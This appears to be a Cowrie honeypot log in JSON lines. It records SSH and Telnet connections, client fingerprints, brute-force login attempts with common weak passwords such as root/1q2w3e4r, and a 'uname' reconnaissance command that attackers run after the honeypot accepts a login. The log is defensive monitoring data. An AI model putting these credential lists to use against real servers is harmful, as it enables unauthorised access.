{"eventid":"cowrie.login.failed","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:14.688766Z","src_ip":"139.19.117.131","session":"53a4d33ae348"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-08-28T03:47:14.707026Z","src_ip":"139.19.117.131","session":"53a4d33ae348"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:14.707549Z","src_ip":"139.19.117.131","session":"53a4d33ae348"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":27076,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9851728e45","protocol":"ssh","message":"New connection: 80.94.95.112:27076 (1.2.3.4:22) [session: ff9851728e45]","sensor":"my-vps","timestamp":"2025-08-28T03:47:19.149215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:47:19.149995Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:47:19.179979Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.login.failed","username":"admin","password":"callofduty","message":"login attempt [admin/callofduty] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:19.342863Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cake","message":"login attempt [admin/cake] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:20.375263Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bunbun","message":"login attempt [admin/bunbun] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:21.407852Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bullwink","message":"login attempt [admin/bullwink] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:22.440584Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.login.failed","username":"admin","password":"brunette","message":"login attempt [admin/brunette] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:23.474312Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19667,"dst_ip":"1.2.3.4","dst_port":22,"session":"c92d7892962e","protocol":"ssh","message":"New connection: 45.125.211.194:19667 (1.2.3.4:22) [session: c92d7892962e]","sensor":"my-vps","timestamp":"2025-08-28T03:47:24.131361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:47:24.154276Z","src_ip":"45.125.211.194","session":"c92d7892962e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:47:24.358737Z","src_ip":"45.125.211.194","session":"c92d7892962e"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:24.507293Z","src_ip":"80.94.95.112","session":"ff9851728e45"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:24.631997Z","src_ip":"139.19.117.131","session":"53a4d33ae348"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:47:25.230213Z","src_ip":"45.125.211.194","session":"c92d7892962e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:47:25.808491Z","src_ip":"45.125.211.194","session":"c92d7892962e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:47:25.809205Z","src_ip":"45.125.211.194","session":"c92d7892962e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:26.030975Z","src_ip":"45.125.211.194","session":"c92d7892962e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:26.032068Z","src_ip":"45.125.211.194","session":"c92d7892962e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22095,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ff0a70e83be","protocol":"ssh","message":"New connection: 45.125.211.194:22095 (1.2.3.4:22) [session: 3ff0a70e83be]","sensor":"my-vps","timestamp":"2025-08-28T03:47:38.894362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:47:38.929194Z","src_ip":"45.125.211.194","session":"3ff0a70e83be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:47:39.113235Z","src_ip":"45.125.211.194","session":"3ff0a70e83be"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:47:39.942108Z","src_ip":"45.125.211.194","session":"3ff0a70e83be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:47:40.380126Z","src_ip":"45.125.211.194","session":"3ff0a70e83be"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:47:40.380800Z","src_ip":"45.125.211.194","session":"3ff0a70e83be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:40.591232Z","src_ip":"45.125.211.194","session":"3ff0a70e83be"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:40.592285Z","src_ip":"45.125.211.194","session":"3ff0a70e83be"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50710,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9ddc7dc2ebc","protocol":"ssh","message":"New connection: 217.72.205.35:50710 (1.2.3.4:22) [session: e9ddc7dc2ebc]","sensor":"my-vps","timestamp":"2025-08-28T03:47:48.362102Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:48.363234Z","src_ip":"217.72.205.35","session":"e9ddc7dc2ebc"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":48335,"dst_ip":"1.2.3.4","dst_port":22,"session":"41e843bb9bb5","protocol":"ssh","message":"New connection: 45.125.211.194:48335 (1.2.3.4:22) [session: 41e843bb9bb5]","sensor":"my-vps","timestamp":"2025-08-28T03:47:53.749954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:47:53.756354Z","src_ip":"45.125.211.194","session":"41e843bb9bb5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:47:53.961546Z","src_ip":"45.125.211.194","session":"41e843bb9bb5"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:47:54.789000Z","src_ip":"45.125.211.194","session":"41e843bb9bb5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:47:55.293339Z","src_ip":"45.125.211.194","session":"41e843bb9bb5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:47:55.294028Z","src_ip":"45.125.211.194","session":"41e843bb9bb5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:55.514315Z","src_ip":"45.125.211.194","session":"41e843bb9bb5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:55.515365Z","src_ip":"45.125.211.194","session":"41e843bb9bb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33372,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9154f0d9a6e","protocol":"telnet","message":"New connection: 212.227.125.160:33372 (1.2.3.4:23) [session: c9154f0d9a6e]","sensor":"my-vps","timestamp":"2025-08-28T03:48:00.597523Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":36581,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1cf3230d246","protocol":"ssh","message":"New connection: 45.125.211.194:36581 (1.2.3.4:22) [session: d1cf3230d246]","sensor":"my-vps","timestamp":"2025-08-28T03:48:08.680636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:48:08.706053Z","src_ip":"45.125.211.194","session":"d1cf3230d246"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:48:08.892699Z","src_ip":"45.125.211.194","session":"d1cf3230d246"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:48:09.721027Z","src_ip":"45.125.211.194","session":"d1cf3230d246"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:48:10.224219Z","src_ip":"45.125.211.194","session":"d1cf3230d246"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:48:10.224920Z","src_ip":"45.125.211.194","session":"d1cf3230d246"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:10.441721Z","src_ip":"45.125.211.194","session":"d1cf3230d246"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:10.442809Z","src_ip":"45.125.211.194","session":"d1cf3230d246"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":26712,"dst_ip":"1.2.3.4","dst_port":22,"session":"373bb71c7c76","protocol":"ssh","message":"New connection: 45.125.211.194:26712 (1.2.3.4:22) [session: 373bb71c7c76]","sensor":"my-vps","timestamp":"2025-08-28T03:48:23.434295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:48:23.440565Z","src_ip":"45.125.211.194","session":"373bb71c7c76"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:48:23.654645Z","src_ip":"45.125.211.194","session":"373bb71c7c76"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:48:24.484411Z","src_ip":"45.125.211.194","session":"373bb71c7c76"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":39810,"dst_ip":"1.2.3.4","dst_port":22,"session":"8df9d802177e","protocol":"ssh","message":"New connection: 194.233.79.134:39810 (1.2.3.4:22) [session: 8df9d802177e]","sensor":"my-vps","timestamp":"2025-08-28T03:48:25.498999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:48:25.555389Z","src_ip":"194.233.79.134","session":"8df9d802177e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:48:25.697064Z","src_ip":"45.125.211.194","session":"373bb71c7c76"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:48:25.738248Z","src_ip":"194.233.79.134","session":"8df9d802177e"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:48:26.739379Z","src_ip":"194.233.79.134","session":"8df9d802177e"}
